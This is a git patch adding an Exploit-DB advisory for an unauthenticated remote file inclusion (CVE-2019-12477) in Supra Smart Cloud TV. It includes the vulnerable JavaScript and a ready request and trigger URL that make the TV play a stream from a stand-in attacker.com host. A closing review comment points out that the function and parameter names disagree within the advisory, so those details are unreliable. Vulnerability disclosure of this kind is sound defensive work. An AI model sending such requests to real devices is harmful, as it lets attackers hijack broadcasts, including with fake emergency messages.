From 35d500a3cba1386927a16d5783af1cd92136df4f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 7 Jun 2019 05:01:54 +0000
Subject: [PATCH] DB: 2019-06-07 1 changes to exploits/shellcodes Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion
---
 exploits/hardware/webapps/46971.txt | 59 +++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 60 insertions(+)
 create mode 100644 exploits/hardware/webapps/46971.txt
diff --git a/exploits/hardware/webapps/46971.txt b/exploits/hardware/webapps/46971.txt
new file mode 100644
index 000000000..b8a2c3419
--- /dev/null
+++ b/exploits/hardware/webapps/46971.txt
@@ -0,0 +1,59 @@
+Exploit Title: Remote file inclusion
+# Date: 03-06-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: https://supra.ru
+# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
+# CVE: CVE-2019-12477
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
+# https://www.inputzero.io/2019/06/hacking-smart-tv.html
+
+Summary:
+Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
+function, which allows a local attacker to broadcast fake video without any
+authentication via a /remote/media_control?action=setUri&uri=URI
+
+Technical Observation:
+We are abusing `openLiveURL()` which allows a local attacker to broadcast
+video on supra smart cloud TV. I found this vulnerability initially by
+source code review and then by crawling the application and reading every
+request helped me to trigger this vulnerability.
+
+Vulnerable code:
+
+ function openLiveTV(url)
+ {
+ $.get("/remote/media_control",
+{m_action:'setUri',m_uri:url,m_type:'video/*'},
+ function (data, textStatus){
+ if("success"==textStatus){
+ alert(textStatus);
+ }else
+ {
+ alert(textStatus);
+ }
+ });
+ }
+
+Vulnerable request:
+
+ GET /remote/media_control?action=setUri&uri=
+http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
+ Host: 192.168.1.155
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
+Gecko/20100101 Firefox/66.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+
+To trigger the vulnerability you can send a crafted request to the URL,
+
+http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
+
+Although the above mention URL takes (.m3u8) format based video. We can use
+`curl -v -X GET` to send such request, typically this is an unauth remote
+file inclusion. An attacker could broadcast any video without any
+authentication, the worst case attacker could leverage this vulnerability
+to broadcast a fake emergency message.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 303f7480f..1d0c9c584 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41379,3 +41379,4 @@ id,file,description,date,author,type,platform,port
 46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
 46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,
+46971,exploits/hardware/webapps/46971.txt,"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion",2019-06-06,"Dhiraj Mishra",webapps,hardware,
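Review bot: The new advisory in exploits/hardware/webapps/46971.txt contradicts itself on the affected function and parameters: the title, summary and CSV description name `openLiveURL()`, but the quoted listing defines `openLiveTV(url)`, and that listing sends `m_action`/`m_uri`/`m_type` while the sample request uses `action` and `uri`. Anyone matching this entry against firmware or writing a detection for it cannot tell which names the endpoint actually accepts, so the text should state which form was observed on the device. The summary also says "local attacker" for an issue classed as remote file inclusion, which presumably means a host on the same network and should be worded that way. The header gives no affected model or firmware version, so a line such as `# Tested on: <model and firmware version>` would help. For defenders, the point the page supports is that `/remote/media_control` honours `setUri` with no authentication, so the TV belongs on a segment untrusted hosts cannot reach, and requests to that path from unexpected sources are worth alerting on.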